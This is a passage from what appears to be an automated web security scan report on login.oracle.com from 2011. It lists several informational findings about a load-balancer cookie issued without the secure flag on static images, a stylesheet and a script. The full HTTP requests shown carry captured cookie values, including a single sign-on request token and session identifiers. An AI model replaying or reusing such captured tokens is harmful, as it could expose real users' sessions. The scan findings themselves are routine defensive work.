x2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCUu6uHK6EVADUS1EHWFB01t_dK
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a.............!.......,...........D..Y.;

7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/ip-o-logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 1728
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCUU6uHK6EVADUS1EHWFB01t_dJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89ar..........22................BB.......................................................................................................__..........................................................
...[SNIP]...

7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/loginStyling.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/loginStyling.css HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 14395
Content-Type: text/css
Last-Modified: Thu, 21 Jul 2011 20:04:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBQw6uHK6EVADUS1EHWFB01t_bN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

/* Desktop Version */
body{font-family:Arial, Helvetica, sans-serif;}
.Mwrapper{ display:none;}
.wrapper{ display:block;margin:0px auto;width:974px; }
.logo-header{float:left; width:974px; height:50px
...[SNIP]...

7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/moc_lib.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 5959
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBR06uHK6EVADUS1EHWFB01t_bO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;

//-- Function Library

// to populate the user name -------------------------------------------------//
function PopulateLogin()
...[SNIP]...

7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/oracle-footer-tagline.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Accept-Ranges: bytes
Content-Length: 1711
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCTJ6uHK6EVADUS1EHWFB01t_dG
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/oralogo_small.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fp